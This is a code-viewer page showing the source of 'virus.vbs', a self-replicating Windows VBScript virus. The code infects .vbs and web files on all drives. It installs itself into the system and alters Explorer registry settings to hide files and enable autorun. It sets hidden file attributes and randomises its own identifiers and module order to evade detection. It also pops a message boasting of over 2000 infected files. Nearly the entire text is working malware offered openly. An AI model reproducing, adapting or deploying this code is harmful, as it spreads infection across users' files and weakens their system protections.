📄 virus.vbs
字号:
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "reg"
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "chm"
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "hlp"
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case Else
If PreInstance = True Then
WScript.Quit
End If
If IsOK(objfso, Date(), FullPath_Config) = False Then
If objfso.FileExists(FullPath_Config) = True Then
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
Select Case Order_Order
Case "InfectFiles"
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Order_Para = Order_Para + Cnt
If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "Msg"
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "UnLoadMe"
Call RestoreSystem(objfso)
Wscript.Quit
Case "KillVirus"
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
Case Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
Set objfso = Nothing
Set objshell = Nothing
End Sub
'ZHISYBKQRKB1_3
'WNXCBDYNEYIEB2_20
Function GetModelCode(vbsCode, N_ModelCode)
On Error Resume Next
Dim n, n1, buffer
buffer = vbsCode
If N_ModelCode>= 1 And N_ModelCode<= 9 Then
n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
End If
End Function
'ZHISYBKQRKB2_20
'WNXCBDYNEYIEB2_15
Sub SetFileAttr(objfso, pathf)
Dim vf
Set vf = objfso.GetFile(pathf)
vf.Attributes = 6
End Sub
'ZHISYBKQRKB2_15
'WNXCBDYNEYIEB2_17
Function PreInstance()
On Error Resume Next
Dim num_cnt
Dim strComputer, objWMIService, colProcessList, objProcess
num_cnt = 0
PreInstance = False
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
For Each objProcess in colProcessList
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
num_cnt = num_cnt + 1
End If
Next
If num_cnt>= 2 Then
PreInstance = True
End If
End Function
'ZHISYBKQRKB2_17
'WNXCBDYNEYIEB2_12
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
On Error Resume Next
Dim tso, buffer, strCode , Maxsize
Maxsize = 350000
If fi.Size< Maxsize Then
Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
tso.Close
If T = 0 Then
Select Case ftype
Case "hta", "htm", "html", "asp"
If Isinfected(buffer, ftype) = False Then
Set tso = objfso.OpenTextFile(strPath, 2, true)
strCode = MakeScript(VbsCode_WebPage, 0)
tso.Write strCode & VBCRLF & buffer
Cnt = Cnt + 1
End If
Case "vbs"
If Isinfected(buffer, ftype) = False Then
n = InStr(buffer , "Option Explicit")
If n<>0 Then
buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
Else
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
End If
End If
Case Else
'
'
End Select
ElseIf T = 1 Then
If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
If n<>0 Then
buffer = Replace(buffer, Tail_V, "", n, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, True)
tso.Write strCode & VBCRLF & buffer
End If
End If
End If
End If
End Sub
'ZHISYBKQRKB2_12
'WNXCBDYNEYIEB2_18
Function IsOK(objfso, Now_V, path_f)
On Error Resume Next
Dim vf, p1, p2, p3
IsOK = False
Set vf = objfso.OpenTextFile(path_f, 1)
p1 = Trim(vf.ReadLine)
p2 = Trim(vf.ReadLine)
p3 = Trim(vf.ReadLine)
If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
End If
If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
IsOK = True
n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
If n = 0 Then
Wscript.Quit
ElseIf n = 1 Then
IsOK = True
ElseIf n = 2 Then
IsOK = False
End If
End If
End Function
'ZHISYBKQRKB2_18
'WNXCBDYNEYIEB2_13
Sub DeSafeSet()
Dim HLMShow , HCUAdvanced, HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
Call WriteReg (HCUExplorer, 129, "REG_DWORD")
Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
Call WriteReg (HLMShow, 0, "REG_DWORD")
End Sub
Sub SafeSet()
Dim HLMShow , HCUSSHidden, HCUHidden
Dim HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
Call WriteReg (HCUHidden, 1, "REG_DWORD")
Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
Call WriteReg (HLMShow, 1, "REG_DWORD")
End Sub
'ZHISYBKQRKB2_13
'WNXCBDYNEYIEB2_26
Sub Run(ExeFullName)
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
Sub CopyFile(objfso, code, pathf)
On Error Resume Next
Dim vf
Set vf = objfso.OpenTextFile(pathf, 2, true)
vf.Write code
End Sub
Function ChangeName(vbsCode, Names)
Dim Name, j, temp, buffer
buffer = vbsCode
Randomize
For Each Name in Names
temp = ""
For j = 1 To Len(Name)
temp = temp & Chr((Int(Rnd * 26) + 65))
Next
buffer = Replace(buffer, Name, temp)
Next
ChangeName = buffer
End Function
'ZHISYBKQRKB2_26
'kj⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -